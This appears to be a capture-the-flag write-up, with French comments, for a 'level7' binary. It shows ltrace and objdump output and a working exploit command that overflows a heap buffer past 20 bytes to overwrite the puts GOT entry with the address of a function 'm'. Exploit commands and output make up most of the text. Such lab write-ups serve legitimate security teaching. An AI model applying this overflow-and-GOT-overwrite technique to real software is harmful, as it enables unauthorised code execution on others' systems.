
ltrace ./level7 $(python -c 'print "A"*20')
***
strcpy(0x0804a018, "aaaaaaaaaaaaaaaaaaaa")   = 0x0804a018
strcpy(0x0804a000, NULL <unfinished ...>
***

ltrace ./level7 $(python -c 'print "A"*24')
***
strcpy(0x0804a018, "AAAAAAAAAAAAAAAAAAAAAAAA") = 0x0804a018
strcpy(0x41414141, NULL <unfinished ...>
***

--- Nous pouvons appercevoir que a partir de 20eme caractere
--- le premier argument de la 2eme fonction strcpy est reecrite par les caracteres suivant.
--- Nous pouvons donc arbitrairement utiliser la fonction strcpy.
--- On decide donc de reecrire a l'addresse de la fonction "puts" (inutile)
--- l'addresse de la function "m"

./level7 $(python -c 'print "A"*20 + "\x08\x04\x99\x28"[::-1]') $(python -c 'print "\x08\x04\x84\xf4"[::-1]')

################################ UTILS ################################

objdump -R level7
DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049904 R_386_GLOB_DAT    __gmon_start__
08049914 R_386_JUMP_SLOT   printf
08049918 R_386_JUMP_SLOT   fgets
0804991c R_386_JUMP_SLOT   time
08049920 R_386_JUMP_SLOT   strcpy
08049924 R_386_JUMP_SLOT   malloc
08049928 R_386_JUMP_SLOT   puts
0804992c R_386_JUMP_SLOT   __gmon_start__
08049930 R_386_JUMP_SLOT   __libc_start_main
08049934 R_386_JUMP_SLOT   fopen

objdump -d ./level7 | grep '<.*>:' | grep -v '<_.*>:'
080483a0 <printf@plt-0x10>:
080483b0 <printf@plt>:
080483c0 <fgets@plt>:
080483d0 <time@plt>:
080483e0 <strcpy@plt>:
080483f0 <malloc@plt>:
08048400 <puts@plt>:
08048430 <fopen@plt>:
080484d0 <frame_dummy>:
080484f4 <m>:
08048521 <main>:
